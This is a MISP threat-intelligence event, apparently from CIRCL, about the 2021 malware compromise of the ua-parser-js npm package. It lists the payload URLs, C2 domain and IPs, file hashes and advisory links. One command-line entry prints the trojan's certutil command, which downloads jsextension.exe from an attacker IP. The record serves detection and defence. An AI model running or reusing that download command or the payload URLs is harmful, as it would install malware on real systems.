{ "Event": { "analysis": "2", "date": "2021-10-24", "extends_uuid": "", "info": "Malware Discovered in Popular NPM Package, ua-parser-js", "publish_timestamp": "1635064007", "published": true, "threat_level_id": "2", "timestamp": "1635063955", "uuid": "ad7665ec-fef2-44eb-a019-b1b25a8aec05", "Orgc": { "name": "CIRCL", "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f" }, "Tag": [ { "colour": "#004646", "local": "0", "name": "type:OSINT", "relationship_type": "" }, { "colour": "#0071c3", "local": "0", "name": "osint:lifetime=\"perpetual\"", "relationship_type": "" }, { "colour": "#0087e8", "local": "0", "name": "osint:certainty=\"50\"", "relationship_type": "" }, { "colour": "#ffffff", "local": "0", "name": "tlp:white", "relationship_type": "" }, { "colour": "#053a00", "local": "0", "name": "misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"", "relationship_type": "" }, { "colour": "#0088cc", "local": "0", "name": "misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\"", "relationship_type": "" } ], "Attribute": [ { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635061972", "to_ids": false, "type": "link", "uuid": "e9d82a66-46bd-4f0e-aeac-17349abddeb0", "value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635062091", "to_ids": false, "type": "link", "uuid": "508a294c-876e-4a8a-a3bd-a3de15e10325", "value": "https://github.com/faisalman/ua-parser-js/issues/536" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635062310", "to_ids": false, "type": "url", "uuid": "f51805cb-5fec-4ce1-b7ae-1d1206720542", "value": "http://159.148.186.228/download/jsextension.exe" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635062343", "to_ids": true, "type": "url", "uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83", "value": "https://citationsherbe.at/sdd.dll" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1635062385", "to_ids": true, "type": "domain", "uuid": "3e4cc221-dbb9-4e64-9523-800d8af8f972", "value": "citationsherbe.at" }, { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": false, "timestamp": "1635062444", "to_ids": true, "type": "sha256", "uuid": "1b1a28a9-2b47-43a3-92b9-c9353497f429", "value": "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd" }, { "category": "Artifacts dropped", "comment": "jsextension.exe", "deleted": false, "disable_correlation": false, "timestamp": "1635062474", "to_ids": true, "type": "sha256", "uuid": "9163b990-5b87-413c-a8e7-f616b908157f", "value": "47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca" } ], "Object": [ { "comment": "", "deleted": false, "description": "Metadata used to generate an executive level report", "meta-category": "misc", "name": "report", "template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df", "template_version": "4", "timestamp": "1635063955", "uuid": "30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "ObjectReference": [ { "comment": "", "object_uuid": "30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "referenced_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "relationship_type": "alerts", "timestamp": "1635063955", "uuid": "892ba669-5323-41f2-b7bf-9093d813aea2" } ], "Attribute": [ { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "link", "timestamp": "1635061938", "to_ids": false, "type": "link", "uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8", "value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "summary", "timestamp": "1635061938", "to_ids": false, "type": "text", "uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424", "value": "Versions of a popular NPM package named ua-parser-js was found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js." }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "type", "timestamp": "1635061938", "to_ids": false, "type": "text", "uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601", "value": "Alert" } ] }, { "comment": "", "deleted": false, "description": "Command line and option related to a software malicious or not to execute specific commands.", "meta-category": "misc", "name": "command-line", "template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf", "template_version": "1", "timestamp": "1635063837", "uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "ObjectReference": [ { "comment": "", "object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "referenced_uuid": "e1f2c049-da88-4238-9dde-4134209c1364", "relationship_type": "is-in-relation-with", "timestamp": "1635062957", "uuid": "97af4dfa-5d0a-47c5-ba72-e00f65c25482" }, { "comment": "", "object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "referenced_uuid": "f51805cb-5fec-4ce1-b7ae-1d1206720542", "relationship_type": "downloads", "timestamp": "1635063003", "uuid": "e205642b-21b0-4daa-a28f-275219dba1ba" }, { "comment": "", "object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "referenced_uuid": "9163b990-5b87-413c-a8e7-f616b908157f", "relationship_type": "related-to", "timestamp": "1635063837", "uuid": "d3629ef3-282a-4527-813e-ec8fa5be906d" } ], "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "value", "timestamp": "1635062024", "to_ids": false, "type": "text", "uuid": "974258e7-2e79-413c-9be8-08698653b87b", "value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "description", "timestamp": "1635062024", "to_ids": false, "type": "text", "uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240", "value": "The trojan try to execute in the cmd" } ] }, { "comment": "", "deleted": false, "description": "Command line and option related to a software malicious or not to execute specific commands.", "meta-category": "misc", "name": "command-line", "template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf", "template_version": "1", "timestamp": "1635063109", "uuid": "57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "ObjectReference": [ { "comment": "Checking the date range of vulnerable packages", "object_uuid": "57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "referenced_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "relationship_type": "identifies", "timestamp": "1635063109", "uuid": "7b9af0b8-1e55-4ac8-ad04-5b96b576fc98" } ], "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "value", "timestamp": "1635062225", "to_ids": false, "type": "text", "uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec", "value": "npm show ua-parser-js time", "Tag": [ { "colour": "#0fbf00", "local": "0", "name": "cycat:scope=\"detection\"", "relationship_type": "" } ] }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "description", "timestamp": "1635062193", "to_ids": false, "type": "text", "uuid": "542061ee-8993-44ef-8261-f27f25dc9067", "value": "To check the time when the package was installed" } ] }, { "comment": "", "deleted": false, "description": "A domain/hostname and IP address seen as a tuple in a specific time frame.", "meta-category": "network", "name": "domain-ip", "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734", "template_version": "10", "timestamp": "1635063682", "uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b", "ObjectReference": [ { "comment": "", "object_uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b", "referenced_uuid": "3e4cc221-dbb9-4e64-9523-800d8af8f972", "relationship_type": "is-in-relation-with", "timestamp": "1635063351", "uuid": "83bd1f6f-8d62-4da9-a6d5-4f74d5ea48e1" }, { "comment": "", "object_uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b", "referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83", "relationship_type": "related-to", "timestamp": "1635063682", "uuid": "177395ef-d715-4122-97ca-be60b7b975fb" } ], "Attribute": [ { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "domain", "timestamp": "1635062540", "to_ids": true, "type": "domain", "uuid": "75318d44-9526-43f4-9f8c-c24edf26a83f", "value": "citationsherbe.at" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "ip", "timestamp": "1635062540", "to_ids": true, "type": "ip-dst", "uuid": "dc052f3a-24fa-4595-8deb-6efb68b59d64", "value": "95.213.165.20" } ] }, { "comment": "", "deleted": false, "description": "A domain/hostname and IP address seen as a tuple in a specific time frame.", "meta-category": "network", "name": "domain-ip", "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734", "template_version": "10", "timestamp": "1635062582", "uuid": "e1f2c049-da88-4238-9dde-4134209c1364", "Attribute": [ { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "ip", "timestamp": "1635062582", "to_ids": true, "type": "ip-dst", "uuid": "2c40cba0-709f-42e0-8f09-9373862a40ac", "value": "159.148.186.228" } ] }, { "comment": "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1635063704", "uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "ObjectReference": [ { "comment": "", "object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "referenced_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "relationship_type": "executes", "timestamp": "1635062818", "uuid": "73a1835e-a0dc-40f2-a86a-172af4025954" }, { "comment": "", "object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83", "relationship_type": "downloads", "timestamp": "1635063384", "uuid": "9f095fe7-ced7-4685-942b-5cbfa35b32c4" }, { "comment": "", "object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "referenced_uuid": "508a294c-876e-4a8a-a3bd-a3de15e10325", "relationship_type": "describes", "timestamp": "1635063704", "uuid": "2a6e821d-81d7-45a6-b420-f8929fc38035" } ], "Attribute": [ { "category": "Payload installation", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "pattern-in-file", "timestamp": "1635062757", "to_ids": true, "type": "pattern-in-file", "uuid": "fbc77d66-169a-48bb-82c5-7ce5c847e205", "value": "ua-parser-js" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1635063451", "uuid": "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "ObjectReference": [ { "comment": "", "object_uuid": "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "referenced_uuid": "a9b50a3c-793f-4541-a123-60716668e2d5", "relationship_type": "analysed-with", "timestamp": "1635063452", "uuid": "e0b56508-2235-4dd3-ad3f-ebf948afa2bf" } ], "Attribute": [ { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1635062444", "to_ids": true, "type": "md5", "uuid": "1b724674-e8c6-4deb-a32b-b6cf86b591a6", "value": "de8b54a938ac18f15cad804d79a0e19d" }, { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1635062444", "to_ids": true, "type": "sha1", "uuid": "88ee0d56-6d8a-4869-9443-1dbe333121c2", "value": "b6004c62e2d9dbad9cfd5f7e18647ac983788766" }, { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1635062444", "to_ids": true, "type": "sha256", "uuid": "22a01316-f9ba-4889-9d29-eaf021bb104b", "value": "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "4", "timestamp": "1635063777", "uuid": "a9b50a3c-793f-4541-a123-60716668e2d5", "ObjectReference": [ { "comment": "", "object_uuid": "a9b50a3c-793f-4541-a123-60716668e2d5", "referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83", "relationship_type": "related-to", "timestamp": "1635063777", "uuid": "3055c698-4f96-41d1-819b-26520b4b5eea" } ], "Attribute": [ { "category": "Other", "comment": "sdd.dll", "deleted": false, "disable_correlation": true, "object_relation": "last-submission", "timestamp": "1635062444", "to_ids": false, "type": "datetime", "uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed", "value": "2021-10-24T04:03:55+00:00" }, { "category": "External analysis", "comment": "sdd.dll", "deleted": false, "disable_correlation": true, "object_relation": "permalink", "timestamp": "1635062444", "to_ids": false, "type": "link", "uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11", "value": "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235" }, { "category": "Artifacts dropped", "comment": "sdd.dll", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1635062444", "to_ids": false, "type": "text", "uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c", "value": "23/50" } ] } ] } }